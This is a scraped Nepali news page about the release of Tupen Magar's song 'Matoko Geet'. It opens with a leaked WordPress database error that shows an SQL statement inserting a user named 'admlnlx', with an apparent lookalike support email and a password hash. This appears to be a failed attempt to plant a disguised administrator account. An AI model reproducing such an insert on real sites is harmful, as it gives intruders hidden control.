WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMgfJwjgFmxRzFzG1QbKBOVyYGR72c1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:19:59', '', 'admlnlx', 'admlnlx')

टुपेन मगरको प्रकृतिको उपहार सार्वजनिक (भिडियो सहित) – Gaule Khabar

टुपेन मगरको प्रकृतिको उपहार सार्वजनिक (भिडियो सहित)

टुपेन मगरको प्रकृतिको उपहार सार्वजनिक (भिडियो सहित)

काठमाण्डौं । टुपेन मगरको प्रकृतिको उपहार “माटोको गीत” बोलको गीत सार्वजनिक भएको छ ।
आज वसन्त पञ्चमीको दिन पारेर गीतकार मगरले उक्त गीतको लिरिकल भिडियो युटुव मार्फत सार्वजानिक गरेका हुन् ।

गीतमा जसिहाङ राईको संगीत, पवनवाङ लामाको संगीत संयोजन, राजेश पायल राई र मेलिना राईको स्वर रहेको छ । गीतमा नेचासल्यानको सुन्दरताको खूब बयान गरिएको छ ।

साोलुखुम्बु जिल्लाको नेचामा जन्मिएका गीतकार मगर हाल हङ्कङ बस्दैआएका छन् । हङ्कङ बसाइ भए पनि नेपाली गीत–संगीतमा उनकोे उपस्थिति रहँदै आएको छ ।

गाउँले इन्टरटेनमेन्टको युटुव च्यानलमार्फत सार्वजनिक भएको लिरिकल भिडियो गंगाराम राईले सम्पादन गरेका छन् । नेपाली गायन क्षेत्रका शिखर गायक–गायिकाको सशक्त गायन भएको यो गीत सबैखाले दर्शक श्रोताले सुन्न/हेर्नलायकको बनेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका